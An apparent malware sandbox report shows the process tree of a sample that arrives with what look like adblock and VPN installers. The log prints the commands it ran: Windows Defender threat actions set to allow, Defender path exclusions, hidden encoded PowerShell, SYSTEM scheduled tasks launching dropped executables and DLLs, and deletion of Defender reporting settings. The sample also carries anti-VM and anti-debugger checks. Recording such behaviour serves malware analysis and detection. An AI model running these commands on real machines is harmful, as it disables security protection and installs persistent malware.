C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4580 -ip 45801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4492 -ip 44921⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{c3fc8945-ae57-f447-b7c5-b6a82972291b}\oemvista.inf" "9" "4d14a44ff" "00000000000000E0" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000000E0"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4492 -ip 44921⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4492 -ip 44921⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4492 -ip 44921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4492 -ip 44921⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exeC:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exe oO /site_id 690689 /S1⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PExkgafzBdIObhRgcoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PExkgafzBdIObhRgcoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hjrwynviHbgqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hjrwynviHbgqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hoTBfSJVSoUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hoTBfSJVSoUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\idMlarptIFwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\idMlarptIFwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jSTUIzYTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jSTUIzYTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hUAxTutGQQYDpiVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hUAxTutGQQYDpiVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MRzBYuVMgjnPKBrT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MRzBYuVMgjnPKBrT\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PExkgafzBdIObhRgcoR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PExkgafzBdIObhRgcoR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PExkgafzBdIObhRgcoR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hjrwynviHbgqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hjrwynviHbgqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hoTBfSJVSoUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hoTBfSJVSoUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idMlarptIFwU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idMlarptIFwU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jSTUIzYTU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jSTUIzYTU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hUAxTutGQQYDpiVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hUAxTutGQQYDpiVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MRzBYuVMgjnPKBrT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MRzBYuVMgjnPKBrT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grtndlJKl" /SC once /ST 03:16:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grtndlJKl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grtndlJKl"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QQVQlcLfPfwBrvcRm" /SC once /ST 00:24:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MRzBYuVMgjnPKBrT\SSmcgxZEVCCRjED\YyVGcMl.exe\" S9 /site_id 690689 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QQVQlcLfPfwBrvcRm"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MRzBYuVMgjnPKBrT\SSmcgxZEVCCRjED\YyVGcMl.exeC:\Windows\Temp\MRzBYuVMgjnPKBrT\SSmcgxZEVCCRjED\YyVGcMl.exe S9 /site_id 690689 /S1⤵
- Checks computer location settings
- Checks for any installed AV software in registry
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjuwDiWYYxyfpXHSNP"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jSTUIzYTU\svcNrj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CIcUyKJLAVuuAuH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CIcUyKJLAVuuAuH2" /F /xml "C:\Program Files (x86)\jSTUIzYTU\NuLsnIa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CIcUyKJLAVuuAuH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CIcUyKJLAVuuAuH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ERNdlmQMglLCRG" /F /xml "C:\Program Files (x86)\idMlarptIFwU2\WLYZmUq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ThRNnZWiFXrHz2" /F /xml "C:\ProgramData\hUAxTutGQQYDpiVB\MfdLFBC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IozMnPJFVGWujOdAQ2" /F /xml "C:\Program Files (x86)\PExkgafzBdIObhRgcoR\noGCoAm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LNuYjITLBITrJpCQlMP2" /F /xml "C:\Program Files (x86)\hjrwynviHbgqC\IdMJTlY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TRumkXcEfDHvRQPKg" /SC once /ST 04:47:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MRzBYuVMgjnPKBrT\ckCPeEto\fXoRqRs.dll\",#1 /site_id 690689" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TRumkXcEfDHvRQPKg"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
